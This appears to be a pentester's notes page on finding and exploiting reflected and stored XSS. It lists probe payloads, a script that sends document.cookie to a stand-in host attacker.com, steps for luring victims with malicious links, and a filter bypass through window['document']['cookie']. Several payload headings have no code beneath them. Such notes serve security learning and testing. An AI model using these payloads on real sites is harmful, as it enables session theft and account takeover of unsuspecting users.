XSS
Reflected:
Identify user input fields:
Find locations where the server reflects user input in the HTTP response. This could be search fields, form submissions, or URL query parameters.
Probe with XSS payloads:
Inject simple XSS payloads like:
https://example.com/search
?q=<script>alert(1)</script>
<img src="x" onerror="alert(1)">
If the input is reflected unsanitized in the HTML response, the payload will be executed in the victim's browser.
Craft a targeted payload:
Once you’ve verified reflection, modify the script to achieve something malicious, such as:
Stealing cookies with
<script>document.location='https://attacker.com?cookie='+document.cookie</script>
.
Deliver payload:
Share the malicious link via email, chat, or any other method. When a victim clicks the link, the XSS payload is executed.
Stored:
dentify input fields that store data:
Look for areas where user data is stored and reflected back later, such as comment sections, user profiles, or message boards.
Test with XSS payload:
Submit an XSS payload like:
<script>alert('XSS')</script>
in a comment or profile field.
If the payload is stored and reflected unsanitized in the webpage, the script will execute when another user views it.
Create a malicious payload:
Use JavaScript to steal session tokens, redirect users, or perform other harmful actions.
Wait for victim interaction:
Once stored, any user who accesses the page will trigger the stored XSS attack.
Common attack vectors:
URL parameters (for reflected XSS).
Comment sections, user profile pages, or message boards (for stored XSS).
Payloads:
Basic payloads
Testing allowed tags:
Intruder tag <§§> with
Copy tags to clipboards: https://portswigger.net/web-security/cross-site-scripting/cheat-sheet
Intruder <allowed-tag%20§§=1>
Copy event to clipboard: https://portswigger.net/web-security/cross-site-scripting/cheat-sheet
Custom tags allowed
Note: The custom tag with the ID x
, which contains an onfocus event handler that triggers the document.location
function. The HASH #
character at the end of the URL focuses on this element as soon as the page is loaded, causing the payload to be called. Host the payload script on the exploit server in script
tags, and send to victim.
SVG payload with animatetransform
Protocol assing inside payload
Autorun with onfocus
Onhashchange
Onresize
Script tag cookie stealer
Input value inside JS backticks
Escaping quote input
XSS WAF bypass
https://www.secjuice.com/bypass-xss-filters-using-javascript-global-variables/
The web application has a filter that prevents using "document.cookie" string into any user input. In this case, JavaScript global variable could be used to bypass it. We have got many way to access the document.cookie
from the window
or self
object. For example, something like window["document"]["cookie"]
will not be blocked
The more complex techniques
Last updated